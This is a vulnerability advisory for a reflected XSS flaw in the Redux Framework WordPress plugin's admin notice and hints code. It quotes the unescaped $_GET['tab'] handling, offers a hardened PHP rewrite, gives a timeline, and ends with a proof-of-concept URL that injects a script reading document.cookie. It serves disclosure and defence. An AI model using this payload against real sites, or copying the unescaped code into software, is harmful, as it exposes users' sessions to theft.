$_GET['tab'] is not escaped.
File: redux-framework\ReduxCore\inc\class.redux_admin_notices.php
$pageName = '';
$curTab   = '';
if ( $pagenow == 'admin.php' || $pagenow == 'themes.php' ) {
    // Get the current page. To avoid errors, we'll set
    // the redux page slug if the GET is empty.
    $pageName = empty( $_GET['page'] ) ? '&page=' . self::$_parent->args['page_slug'] : '&page=' . $_GET['page'];
    // Ditto for the current tab. $_GET['tab'] is taken verbatim, with no escaping or validation.
    $curTab = empty( $_GET['tab'] ) ? '&tab=0' : '&tab=' . $_GET['tab'];
}
global $wp_version;
// Print the notice with the dismiss link
if ( version_compare( $wp_version, '4.2', '>' ) ) {
    $output    = "";
    // $curTab (and $_GET['page']) land unescaped in the id attributes below.
    $css_id    = $notice['id'] . $pageName . $curTab;
    $css_class = $notice['type'] . ' redux-notice notice is-dismissible redux-notice';
    $output .= "<div {$add_style} id='$css_id' class='$css_class'> \n";
    $nonce = wp_create_nonce( $notice['id'] . $pageName . $curTab . 'nonce' );
    $output .= "<input type='hidden' class='dismiss_data' id='" . $notice['id'] . $pageName . $curTab . "' value='{$nonce}'> \n";
    $output .= "<p>{$notice['msg']}</p>";
    $output .= "</div> \n";
    echo $output;
} else {
    // Pre-4.2 branch: the same unescaped values go into the dismiss href.
    echo '<div ' . $add_style . ' class="' . $notice['type'] . ' notice is-dismissable"><p>' . $notice['msg'] . ' <a href="?dismiss=true&id=' . $notice['id'] . $pageName . $curTab . '">' . __( 'Dismiss', 'redux-framework' ) . '</a>.</p></div>';
}
So if the user has at least one notice that has not been dismissed, we have a reflected XSS.
A similar bug exists in the hints code:
$curTab = '0';
if ( isset ( $_GET['tab'] ) ) {
    // Again $_GET['tab'] is used verbatim.
    $curTab = $_GET['tab'];
}
// Default url values for enabling hints.
$dismiss = 'true';
$s       = __( 'Enable', 'redux-framework' );
// Values for disabling hints.
if ( 'true' == $hint_status ) {
    $dismiss = 'false';
    $s       = __( 'Disable', 'redux-framework' );
}
// Make URL: $curTab is concatenated into the href attribute unescaped.
$url = '<a class="redux_hint_status" href="?dismiss=' . $dismiss . '&id=hints&page=' . $curPage . '&tab=' . $curTab . '">' . $s . ' hints</a>';
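As an added example (not Redux Framework's code), here is a hardened version of the page/tab handling shared by both snippets above: the tab index is coerced to an integer, the page slug is checked against a character whitelist, and every dynamic value is attribute-encoded at output. Outside WordPress, htmlspecialchars() stands in for esc_attr(); inside a plugin you would use esc_attr()/esc_url() for output and absint() for the tab. The $notice array, the $get request and the nonce are constructed inputs; the function names are mine.

```php
<?php
// Added example, not Redux Framework code: hardened handling of the
// ?page= and ?tab= values that both snippets above echo unescaped.
// htmlspecialchars() stands in for WordPress's esc_attr(); in a plugin
// use esc_attr() / esc_url() for output and absint() for the tab index.

/**
 * Validate the query values before they reach any HTML. Returns the same
 * '&page=...' / '&tab=...' fragments the original builds, but only from
 * a character whitelist (slug) and a non-negative integer (tab).
 */
function redux_safe_page_and_tab( array $get, string $default_slug ): array {
    $page = $default_slug;
    if ( isset( $get['page'] ) && preg_match( '/^[A-Za-z0-9_-]+$/', (string) $get['page'] ) ) {
        $page = (string) $get['page'];
    }
    // The tab is an index ('&tab=0' by default), so anything that is not a
    // non-negative integer collapses to 0 instead of being echoed back.
    $tab = isset( $get['tab'] ) ? abs( (int) $get['tab'] ) : 0;
    return array( '&page=' . $page, '&tab=' . $tab );
}

/** Attribute-encode a value; ENT_QUOTES also covers the single-quoted attributes used here. */
function redux_attr( string $value ): string {
    return htmlspecialchars( $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' );
}

/** Build the dismissible notice with every dynamic value escaped at output. */
function redux_safe_notice_html( array $notice, array $get, string $default_slug, string $nonce ): string {
    list( $pageName, $curTab ) = redux_safe_page_and_tab( $get, $default_slug );
    $css_id    = $notice['id'] . $pageName . $curTab;
    $css_class = $notice['type'] . ' redux-notice notice is-dismissible';
    // Escape even after validation: the id string still contains '&'.
    $html  = "<div id='" . redux_attr( $css_id ) . "' class='" . redux_attr( $css_class ) . "'>\n";
    $html .= "<input type='hidden' class='dismiss_data' id='" . redux_attr( $css_id ) . "' value='" . redux_attr( $nonce ) . "'>\n";
    // $notice['msg'] is developer-supplied HTML in the original, not request data, so it is kept as-is.
    $html .= "<p>{$notice['msg']}</p>\n</div>\n";
    return $html;
}

// Constructed request replaying the advisory's proof-of-concept payload in ?tab=.
$get    = array( 'tab' => "\\'><script>alert(document.cookie);</script>" );
$notice = array( 'id' => 'notice1', 'type' => 'updated', 'msg' => 'Sample notice' );
echo redux_safe_notice_html( $notice, $get, 'redux_options', 'constructed-nonce' );
```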
Proof of Concept
http://wp/wp-admin/themes.php?tab=\'><script>alert(document.cookie);</script>
Timeline
- 26-10-2015: Discovered
- 26-10-2015: Vendor notified
- 29-10-2015: Version 3.5.8.7 released, issue resolved